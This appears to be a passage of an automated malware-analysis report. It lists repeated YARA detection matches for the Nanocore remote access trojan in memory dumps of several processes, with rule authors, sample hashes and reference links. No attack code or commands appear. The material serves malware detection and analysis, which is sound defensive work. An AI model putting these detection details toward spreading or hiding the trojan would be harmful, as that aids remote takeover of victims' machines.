        Source: 0000000C.00000003.422141219.0000000004B1C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.422141219.0000000004B1C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000005.00000002.567098678.00000000011A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000005.00000002.567098678.00000000011A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000003.513192668.00000000042AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.513192668.00000000042AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000020.00000002.539382391.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000003.516361406.0000000004276000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.516361406.0000000004276000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000003.469891641.0000000003E8C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000003.469891641.0000000003E8C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.421763189.0000000004A16000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.421763189.0000000004A16000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.423525061.00000000049E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.423525061.00000000049E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000005.00000002.574999029.0000000006440000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000005.00000002.574999029.0000000006440000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000016.00000003.469212700.0000000003E24000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000003.469212700.0000000003E24000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000003.472098835.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000003.472098835.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000003.513666767.0000000004348000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.513666767.0000000004348000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000018.00000002.493660606.0000000003711000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.420907021.0000000004A16000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.420907021.0000000004A16000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.421847119.0000000004A7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.421847119.0000000004A7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000003.469336157.0000000003E24000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000003.469336157.0000000003E24000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000003.471685199.0000000003DBA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000003.471685199.0000000003DBA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.422029126.0000000004AB4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.422029126.0000000004AB4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000020.00000002.537091542.0000000001302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000020.00000002.537091542.0000000001302000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000003.516187648.00000000042AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.516187648.00000000042AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000003.467883620.0000000003D86000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000003.467883620.0000000003D86000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000003.468798612.0000000003D86000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000003.468798612.0000000003D86000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.384816077.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.384816077.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000003.468698040.0000000003DBA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000003.468698040.0000000003DBA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000003.469466887.0000000003E58000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000003.469466887.0000000003E58000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000003.468029326.0000000003DEF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000003.468029326.0000000003DEF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.385533357.0000000004393000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.385533357.0000000004393000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000003.471893908.0000000003D86000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000003.471893908.0000000003D86000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000003.471520869.0000000003DEF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000003.471520869.0000000003DEF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000003.515810065.00000000042DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.515810065.00000000042DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.423356287.0000000004A16000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.423356287.0000000004A16000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.386935348.00000000042C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.386935348.00000000042C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.421567836.00000000049E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.421567836.00000000049E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000003.516555865.0000000004241000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.516555865.0000000004241000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.386760974.000000000435E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.386760974.000000000435E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000018.00000002.492519775.0000000001302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000018.00000002.492519775.0000000001302000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000003.513089293.0000000004241000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.513089293.0000000004241000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.384853009.00000000042F6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.384853009.00000000042F6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000005.00000002.575657153.0000000006FB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000005.00000002.575657153.0000000006FB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000005.00000002.575569142.0000000006F90000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000005.00000002.575569142.0000000006F90000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000001D.00000003.512868270.0000000004276000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.512868270.0000000004276000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000018.00000002.493877285.0000000004719000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000003.468116768.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
